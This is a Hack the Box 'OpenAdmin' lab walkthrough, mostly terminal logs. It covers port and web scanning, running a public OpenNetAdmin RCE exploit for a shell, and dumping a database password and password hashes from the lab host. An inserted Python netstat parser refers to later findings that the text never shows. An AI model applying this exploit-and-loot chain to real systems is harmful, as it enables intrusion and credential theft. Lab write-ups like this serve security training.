Hack the Box - OpenAdmin
nmap
dirb
kali@kali:~$ nmap -v -A 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-19 01:25 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating Ping Scan at 01:25
Scanning 10.10.10.171 [2 ports]
Completed Ping Scan at 01:25, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:25
Completed Parallel DNS resolution of 1 host. at 01:25, 2.24s elapsed
Initiating Connect Scan at 01:25
Scanning 10.10.10.171 [1000 ports]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Completed Connect Scan at 01:25, 14.28s elapsed (1000 total ports)
Initiating Service scan at 01:25
Scanning 2 services on 10.10.10.171
Completed Service scan at 01:25, 6.36s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.171.
Initiating NSE at 01:25
Completed NSE at 01:25, 4.95s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.69s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Nmap scan report for 10.10.10.171
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Initiating NSE at 01:25
Completed NSE at 01:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.34 seconds
port 80
kali@kali:~$ dirb http://10.10.10.171
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 19 01:27:24 2020
URL_BASE: http://10.10.10.171/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.171/ ----
==> DIRECTORY: http://10.10.10.171/artwork/
+ http://10.10.10.171/index.html (CODE:200|SIZE:10918)
--> Testing: http://10.10.10.171/kb_results
==> DIRECTORY: http://10.10.10.171/music/
+ http://10.10.10.171/server-status (CODE:403|SIZE:277)
---- Entering directory: http://10.10.10.171/artwork/ ----
==> DIRECTORY: http://10.10.10.171/artwork/css/
==> DIRECTORY: http://10.10.10.171/artwork/fonts/
==> DIRECTORY: http://10.10.10.171/artwork/images/
+ http://10.10.10.171/artwork/index.html (CODE:200|SIZE:14461)
==> DIRECTORY: http://10.10.10.171/artwork/js/
---- Entering directory: http://10.10.10.171/music/ ----
==> DIRECTORY: http://10.10.10.171/music/css/
==> DIRECTORY: http://10.10.10.171/music/img/
+ http://10.10.10.171/music/index.html (CODE:200|SIZE:12554)
==> DIRECTORY: http://10.10.10.171/music/js/
---- Entering directory: http://10.10.10.171/artwork/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/artwork/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/artwork/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/artwork/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/music/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/music/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.171/music/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun Apr 19 02:07:21 2020
DOWNLOADED: 13836 - FOUND: 4
nikto
kali@kali:~$ nikto -host http://10.10.10.171
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.171
+ Target Hostname: 10.10.10.171
+ Target Port: 80
+ Start Time: 2020-04-19 01:26:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 597dbd5dcea8b, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
opennetadmin exploit
kali@kali:~$ searchsploit opennetadmin
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | exploits/php/webapps/47691.sh
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:/usr/share/exploitdb/exploits/php/webapps$ ./47691.sh whoami
./47691.sh: line 8: $'\r': command not found
./47691.sh: line 16: $'\r': command not found
./47691.sh: line 18: $'\r': command not found
./47691.sh: line 23: syntax error near unexpected token `done'
./47691.sh: line 23: `done'
kali@kali:/usr/share/exploitdb/exploits/php/webapps$ sudo dos2unix 47691.sh
[sudo] password for kali:
dos2unix: converting file 47691.sh to Unix format...
kali@kali:/usr/share/exploitdb/exploits/php/webapps$ ./47691.sh http://10.10.10.171/ona/ whoami
$ whoami
www-data
$ whoami
www-data
$ pwd
/opt/ona/www
$
$ cat config/auth_ldap.config.php
'/cn=(.+?),/i');
//$conf['auth']['ldap']['referrals'] = '0';
// Novell E-Directory, anonymous bind example
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=users,ou=example,o=com';
//$conf['auth']['ldap']['mapping']['grps'] = array('groupmembership'=>'/cn=(.+?),/i');
//$conf['auth']['ldap']['userfilter'] = '(&(!(loginDisabled=TRUE)))';
//OpenLDAP with superuser bind
//$conf['auth']['ldap']['binddn'] = 'cn=Manager,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['bindpw'] = 'mysecretbindpassword';
//$conf['auth']['ldap']['usertree'] = 'cn=%{user},ou=People,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['grouptree'] = 'ou=Group,dc=my,dc=example,dc=com';
//$conf['auth']['ldap']['groupfilter'] = '(&(objectClass=posixGroup)(|(memberUid=%{dn})(memberUid=%{user})))';
$ cat config/config.inc.php
'DEFAULT',
/* Used in header.php */
"title" => 'OpenNetAdmin :: ',
"meta_description" => '',
"meta_keywords" => '',
"html_headers" => '',
/* Include Files: HTML */
"html_style_sheet" => "$include/html_style_sheet.inc.php",
"html_desktop" => "$include/html_desktop.inc.php",
"loading_icon" => "
",
/* Include Files: Functions */
"inc_functions" => "$include/functions_general.inc.php",
"inc_functions_gui" => "$include/functions_gui.inc.php",
"inc_functions_db" => "$include/functions_db.inc.php",
"inc_functions_auth" => "$include/functions_auth.inc.php",
"inc_db_sessions" => "$include/adodb_sessions.inc.php",
"inc_adodb" => "$include/adodb/adodb.inc.php",
"inc_adodb_xml" => "$include/adodb/adodb-xmlschema03.inc.php",
"inc_xajax_stuff" => "$include/xajax_setup.inc.php",
"inc_diff" => "$include/DifferenceEngine.php",
/* Settings for dcm.pl */
"dcm_module_dir" => "$base/modules",
"plugin_dir" => "$base/local/plugins",
/* Defaults for some user definable options normally in sys_config table */
"debug" => "2",
"syslog" => "0",
"stdout" => "0",
"log_to_db" => "0",
"logfile" => "/var/log/ona.log",
/* The output charset to be used in htmlentities() and htmlspecialchars() filtering */
"charset" => "utf8",
"php_charset" => "UTF-8",
// enable the setting of the database character set using the "set name 'charset'" SQL command
// This should work for mysql and postgres but may not work for Oracle.
// it will be set to the value in 'charset' above.
"set_db_charset" => TRUE,
);
// Read in the version file to our conf variable
// It must have a v., no number padding, to match the check version code.
if (file_exists($base.'/../VERSION')) { $conf['version'] = trim(file_get_contents($base.'/../VERSION')); }
// The $self array is used to store globally available temporary data.
// Think of it as a cache or an easy way to pass data around ;)
// I've tried to define the entries that are commonly used:
$self = array (
// Error messages will often get stored in here
"error" => "",
// All sorts of things get cached in here to speed things up
"cache" => array(),
// Get's automatically set to 1 if we're using HTTPS/SSL
"secure" => 0,
);
// If the server port is 443 then this is a secure page
// This is basically used to put a padlock icon on secure pages.
if ($_SERVER['SERVER_PORT'] == 443) { $self['secure'] = 1; }
///////////////////////////////////////////////////////////////////////////////
// STYLE SHEET STUFF //
///////////////////////////////////////////////////////////////////////////////
// Colors
$color['bg'] = '#FFFFFF';
$color['content_bg'] = '#FFFFFF';
$color['bar_bg'] = '#D3DBFF';
$color['border'] = '#555555'; //#1A1A1A
$color['form_bg'] = '#FFEFB6';
$color['font_default'] = '#000000';
$color['font_title'] = '#4E4E4E';
$color['font_subtitle'] = '#5A5A5A';
$color['font_error'] = '#E35D5D';
$color['link'] = '#6B7DD1';
$color['vlink'] = '#6B7DD1';
$color['alink'] = '#6B7DD1';
$color['link_nav'] = '#0048FF'; // was '#7E8CD7';
$color['link_act'] = '#FF8000'; // was '#EB8F1F';
$color['link_domain'] = 'green'; // was '#5BA65B';
$color['button_normal'] = '#FFFFFF';
$color['button_hover'] = '#E0E0E0';
// Define some colors for the subnet map:
$color['bgcolor_map_host'] = '#BFD2FF';
$color['bgcolor_map_subnet'] = '#CCBFFF';
$color['bgcolor_map_selected'] = '#FBFFB6';
$color['bgcolor_map_empty'] = '#FFFFFF';
// Much of this configuration is required here since
// a lot of it's used in xajax calls before a web page is created.
$color['menu_bar_bg'] = '#F3F1FF';
$color['menu_header_bg'] = '#FFFFFF';
$color['menu_item_bg'] = '#F3F1FF';
$color['menu_header_text'] = '#436976';
$color['menu_item_text'] = '#436976';
$color['menu_item_selected_bg']= '#B1C6E3';
$color['menu_header_bg'] = '#B1C6E3';
// Style variables (used in PHP in various places)
$style['font-family'] = "Arial, Sans-Serif";
$style['borderT'] = "border-top: 1px solid {$color['border']};";
$style['borderB'] = "border-bottom: 1px solid {$color['border']};";
$style['borderL'] = "border-left: 1px solid {$color['border']};";
$style['borderR'] = "border-right: 1px solid {$color['border']};";
// Include the localized configuration settings
// MP: this may not be needed now that "user" configs are in the database
@include("{$base}/local/config/config.inc.php");
// Include the basic system functions
// any $conf settings used in this "require" should not be user adjusted in the sys_config table
require_once($conf['inc_functions']);
// Include the basic database functions
require_once($conf['inc_functions_db']);
// Include the localized Database settings
$dbconffile = "{$base}/local/config/database_settings.inc.php";
if (file_exists($dbconffile)) {
if (substr(exec("php -l $dbconffile"), 0, 28) == "No syntax errors detected in") {
@include($dbconffile);
} else {
echo "Syntax error in your DB config file: {$dbconffile}
Please check that it contains a valid PHP formatted array, or check that you have the php cli tools installed.
You can perform this check maually using the command 'php -l {$dbconffile}'.";
exit;
}
} else {
require_once($base.'/../install/install.php');
exit;
}
// Check to see if the run_install file exists.
// If it does, run the install process.
if (file_exists($base.'/local/config/run_install') or @$runinstaller or @$install_submit == 'Y') {
// Process the install script
require_once($base.'/../install/install.php');
exit;
}
// Set multibyte encoding to UTF-8
if (@function_exists('mb_internal_encoding')) {
mb_internal_encoding("UTF-8");
} else {
printmsg("INFO => Missing 'mb_internal_encoding' function. Please install PHP 'mbstring' functions for proper UTF-8 encoding.", 0);
}
// If we dont have a ona_context set in the cookie, lets set a cookie with the default context
if (!isset($_COOKIE['ona_context_name'])) { $_COOKIE['ona_context_name'] = $conf['default_context']; setcookie("ona_context_name", $conf['default_context']); }
// (Re)Connect to the DB now.
global $onadb;
$onadb = db_pconnect('', $_COOKIE['ona_context_name']);
// Load the actual user config from the database table sys_config
// These will override any of the defaults set above
list($status, $rows, $records) = db_get_records($onadb, 'sys_config', 'name like "%"', 'name');
foreach ($records as $record) {
printmsg("INFO => Loaded config item from database: {$record['name']}=''{$record['value']}''",5);
$conf[$record['name']] = $record['value'];
}
// Include functions that replace the default session handler with one that uses MySQL as a backend
require_once($conf['inc_db_sessions']);
// Include the GUI functions
require_once($conf['inc_functions_gui']);
// Include the AUTH functions
require_once($conf['inc_functions_auth']);
// Start the session handler (this calls a function defined in functions_general)
startSession();
// Set session inactivity threshold
ini_set("session.gc_maxlifetime", $conf['cookie_life']);
// if search_results_per_page is in the session, set the $conf variable to it. this fixes the /rows command
if (isset($_SESSION['search_results_per_page'])) $conf['search_results_per_page'] = $_SESSION['search_results_per_page'];
// Set up our page to https if requested for our URL links
if (@($conf['force_https'] == 1) or ($_SERVER['SERVER_PORT'] == 443)) {
$https = "https://{$_SERVER['SERVER_NAME']}";
}
else {
if ($_SERVER['SERVER_PORT'] != 80) {
$https = "http://{$_SERVER['SERVER_NAME']}:{$_SERVER['SERVER_PORT']}";
} else {
$https = "http://{$_SERVER['SERVER_NAME']}";
}
}
// DON'T put whitespace at the beginning or end of included files!!!
?>
$ ls /etc/init.d
acpid
apache-htcacheclean
apache2
apparmor
apport
atd
console-setup.sh
cron
cryptdisks
cryptdisks-early
dbus
ebtables
grub-common
hwclock.sh
irqbalance
iscsid
keyboard-setup.sh
kmod
lvm2
lvm2-lvmetad
lvm2-lvmpolld
lxcfs
lxd
mdadm
mdadm-waitidle
mysql
networking
open-iscsi
open-vm-tools
plymouth
plymouth-log
procps
rsync
rsyslog
screen-cleanup
ssh
udev
ufw
unattended-upgrades
uuidd
$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.171:43550 10.10.17.174:5555 CLOSE_WAIT
tcp 0 0 10.10.10.171:43548 10.10.17.174:5555 CLOSE_WAIT
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 10.10.10.171:80 10.10.14.152:48182 ESTABLISHED
tcp6 1 0 10.10.10.171:80 10.10.17.174:53906 CLOSE_WAIT
tcp6 0 0 10.10.10.171:80 10.10.14.152:47590 TIME_WAIT
tcp6 1 0 10.10.10.171:80 10.10.17.174:53897 CLOSE_WAIT
tcp6 0 0 10.10.10.171:80 10.10.14.152:48016 TIME_WAIT
tcp6 0 435 10.10.10.171:80 10.10.14.152:48156 ESTABLISHED
tcp6 0 0 10.10.10.171:80 10.10.14.57:54142 FIN_WAIT2
tcp6 0 0 10.10.10.171:80 10.10.14.152:47728 TIME_WAIT
tcp6 0 0 10.10.10.171:80 10.10.14.152:47878 TIME_WAIT
udp 0 0 127.0.0.53:53 0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] SEQPACKET LISTENING 13966 /run/udev/control
unix 3 [ ] DGRAM 13925 /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 17729 @irqbalance554.sock
unix 2 [ ACC ] STREAM LISTENING 13928 /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 13941 /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 13943 /run/systemd/journal/syslog
unix 2 [ ACC ] STREAM LISTENING 13945 /run/lvm/lvmetad.socket
unix 2 [ ACC ] STREAM LISTENING 13947 /run/systemd/journal/stdout
unix 8 [ ] DGRAM 13949 /run/systemd/journal/socket
unix 4 [ ] DGRAM 13969 /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 16985 /var/lib/lxd/unix.socket
unix 2 [ ACC ] STREAM LISTENING 21686 /var/run/mysqld/mysqld.sock
unix 2 [ ACC ] STREAM LISTENING 16156 /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 16983 /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 16989 /run/snapd.socket
unix 2 [ ACC ] STREAM LISTENING 16991 /run/snapd-snap.socket
unix 2 [ ACC ] STREAM LISTENING 16997 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 17000 /run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 17002 @ISCSIADM_ABSTRACT_NAMESPACE
unix 3 [ ] STREAM CONNECTED 20210 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17909
unix 3 [ ] STREAM CONNECTED 19447
unix 3 [ ] STREAM CONNECTED 20225 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 20896 /var/run/dbus/system_bus_socket
unix 3 [ ] DGRAM 13927
unix 3 [ ] STREAM CONNECTED 17123 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 16915 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17109 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 16150
unix 3 [ ] STREAM CONNECTED 21647
unix 3 [ ] STREAM CONNECTED 17645
unix 3 [ ] STREAM CONNECTED 17111 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17646 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17098
unix 3 [ ] STREAM CONNECTED 17021
unix 3 [ ] STREAM CONNECTED 16307
unix 3 [ ] DGRAM 13926
unix 3 [ ] STREAM CONNECTED 17110 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17727 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 16394
unix 3 [ ] STREAM CONNECTED 18406
unix 3 [ ] DGRAM 15487
unix 3 [ ] STREAM CONNECTED 17571 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 178332
unix 3 [ ] STREAM CONNECTED 178333 /var/run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 17570
unix 3 [ ] STREAM CONNECTED 16999
unix 3 [ ] DGRAM 15161
unix 3 [ ] DGRAM 15162
unix 3 [ ] DGRAM 16976
unix 2 [ ] DGRAM 16973
unix 3 [ ] DGRAM 16979
unix 3 [ ] STREAM CONNECTED 15474
unix 3 [ ] STREAM CONNECTED 18247 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 17114
unix 3 [ ] DGRAM 16653
unix 2 [ ] DGRAM 15481
unix 3 [ ] DGRAM 16652
unix 3 [ ] STREAM CONNECTED 17121 /var/run/dbus/system_bus_socket
unix 3 [ ] DGRAM 16977
unix 3 [ ] STREAM CONNECTED 17120
unix 3 [ ] STREAM CONNECTED 20575
unix 3 [ ] STREAM CONNECTED 16643 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 18246
unix 2 [ ] DGRAM 17106
unix 3 [ ] DGRAM 16978
unix 3 [ ] STREAM CONNECTED 18938
unix 3 [ ] STREAM CONNECTED 18072
unix 3 [ ] DGRAM 15489
unix 3 [ ] STREAM CONNECTED 16747
unix 3 [ ] STREAM CONNECTED 16416 /run/systemd/journal/stdout
unix 2 [ ] DGRAM 15051
unix 3 [ ] STREAM CONNECTED 157947 /var/run/mysqld/mysqld.sock
unix 3 [ ] STREAM CONNECTED 16621 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14095
unix 3 [ ] STREAM CONNECTED 16748 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 14887
unix 3 [ ] STREAM CONNECTED 17204
unix 3 [ ] STREAM CONNECTED 17495
unix 2 [ ] DGRAM 16152
unix 3 [ ] STREAM CONNECTED 18073 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 17107
unix 3 [ ] STREAM CONNECTED 16723 /run/systemd/journal/stdout
unix 3 [ ] DGRAM 15490
unix 2 [ ] DGRAM 14820
unix 2 [ ] DGRAM 16932
unix 3 [ ] STREAM CONNECTED 16651 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 18439 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17108
unix 3 [ ] STREAM CONNECTED 158839
unix 3 [ ] STREAM CONNECTED 18939 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 17725 /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 16017
unix 3 [ ] STREAM CONNECTED 15765
unix 3 [ ] STREAM CONNECTED 17913 /run/systemd/journal/stdout
unix 3 [ ] DGRAM 15488
unix 3 [ ] STREAM CONNECTED 17724
unix 2 [ ] DGRAM 17412
unix 3 [ ] STREAM CONNECTED 17496 /run/systemd/journal/stdout
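The netstat dump above is long, but the part that matters for the next pivot is small: three services are bound to loopback only (3306, 52846 and 53), so they are invisible from the nmap scan and only reachable once code runs on the box. The following parser is an added example, not part of the original writeup and not a standard tool; it reads `netstat -an` text and picks out the loopback-only listeners. The sample text is the TCP/UDP portion of the dump above; the function names are this example's own.

```python
"""Triage a netstat -an dump for services that only listen on loopback.

Added example, not part of the original writeup. NETSTAT_SAMPLE is the
TCP/UDP listener section copied from the page's netstat output.
"""
import ipaddress

NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 10.10.10.171:43550 10.10.17.174:5555 CLOSE_WAIT
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
"""


def split_endpoint(endpoint):
    """'127.0.0.1:3306' -> ('127.0.0.1', 3306); ':::80' -> ('::', 80).
    rpartition is needed because IPv6 addresses contain colons themselves."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def listeners(netstat_text):
    """Return {(proto, port): bind_address} for every listening socket.
    UDP has no LISTEN state, so a UDP line whose peer is the wildcard '*'
    is treated as a listener."""
    found = {}
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] not in ("tcp", "tcp6", "udp", "udp6"):
            continue
        proto, local, foreign = parts[0], parts[3], parts[4]
        state = parts[5] if len(parts) > 5 else ""
        is_listen = state == "LISTEN" or (
            proto.startswith("udp") and foreign.endswith(":*"))
        if not is_listen:
            continue
        host, port = split_endpoint(local)
        found[(proto, port)] = host
    return found


def loopback_only(netstat_text):
    """Ports reachable only from the box itself, as {port: {protos}}.
    These are the ones to curl or port-forward after getting a foothold."""
    result = {}
    for (proto, port), host in listeners(netstat_text).items():
        try:
            if ipaddress.ip_address(host).is_loopback:
                result.setdefault(port, set()).add(proto)
        except ValueError:      # e.g. a '*' bind address on some netstat builds
            continue
    return result


if __name__ == "__main__":
    for port, protos in sorted(loopback_only(NETSTAT_SAMPLE).items()):
        print("loopback-only: %d/%s" % (port, ",".join(sorted(protos))))
```

Port 52846 is the one worth following up: further down it turns out to be an Apache vhost bound to 127.0.0.1 (see internal.conf), while 3306 is the MySQL instance whose credentials sit in database_settings.inc.php.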
$ ls -al /home/
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Apr 18 20:43 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
$ cat /etc/issue
Ubuntu 18.04.3 LTS \n \l
Ubuntu 18.04 - 'lxd' Privilege Escalation | exploits/linux/local/46978.sh
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
$ ls -al /opt/
total 24
drwxr-xr-x 3 root root 4096 Apr 19 05:39 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 7 www-data www-data 4096 Nov 21 18:23 ona
-rw-r--r-- 1 root root 0 Nov 22 23:49 priv
-rw-r--r-- 1 root root 2 Apr 19 05:32 priv.save
-rw-r--r-- 1 root root 33 Apr 19 05:36 priv.save.1
-rw-r--r-- 1 root root 1210 Apr 19 05:39 priv.save.2
$ ls /opt/priv/
$ cat /opt/priv
$ cat /opt/priv.save
$ cat /opt/priv.save.1
2f907ed450b361b2c2bf4e8795d5b561
$ cat /opt/priv.save.2
2f907ed450b361b2c2bf4e8795d5b561
root:$6$BGk6CBPE$FoDCUgY.1pnYDkqDr4.yNm4jQqnnG7side9P6ApdQWWqLr6t1DHq/iXuNF7F0fkivSYXajUp/bK2cw/D/3ubU/:18222:0:99999:7:::
daemon:*:18113:0:99999:7:::
bin:*:18113:0:99999:7:::
sys:*:18113:0:99999:7:::
sync:*:18113:0:99999:7:::
games:*:18113:0:99999:7:::
man:*:18113:0:99999:7:::
lp:*:18113:0:99999:7:::
mail:*:18113:0:99999:7:::
news:*:18113:0:99999:7:::
uucp:*:18113:0:99999:7:::
proxy:*:18113:0:99999:7:::
www-data:*:18113:0:99999:7:::
backup:*:18113:0:99999:7:::
list:*:18113:0:99999:7:::
irc:*:18113:0:99999:7:::
gnats:*:18113:0:99999:7:::
nobody:*:18113:0:99999:7:::
systemd-network:*:18113:0:99999:7:::
systemd-resolve:*:18113:0:99999:7:::
syslog:*:18113:0:99999:7:::
messagebus:*:18113:0:99999:7:::
_apt:*:18113:0:99999:7:::
lxd:*:18113:0:99999:7:::
uuidd:*:18113:0:99999:7:::
dnsmasq:*:18113:0:99999:7:::
landscape:*:18113:0:99999:7:::
pollinate:*:18113:0:99999:7:::
sshd:*:18221:0:99999:7:::
jimmy:$6$XnCB2K/6$QALmpgLWhDwUjcNldzgtafb6Tt1dT.uyIfxdhDYOVGdlNgIyDX89hz29P.aDQM9OBSSsI2dJGUYYTmQtdb2zw.:18222:0:99999:7:::
mysql:!:18221:0:99999:7:::
joanna:$6$gmFfLksM$XJl08bIFRUki/Lecq8RKFzFFvleGn9CjiqrQxU4n/l6JZe/FSRbe0I/W3L86yWibCJejfrMzgH3HvUezxhCWI0:18222:0:99999:7:::
2f907ed450b361b2c2bf4e8795d5b561 1291532801
$ cat local/config/database_settings.inc.php
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
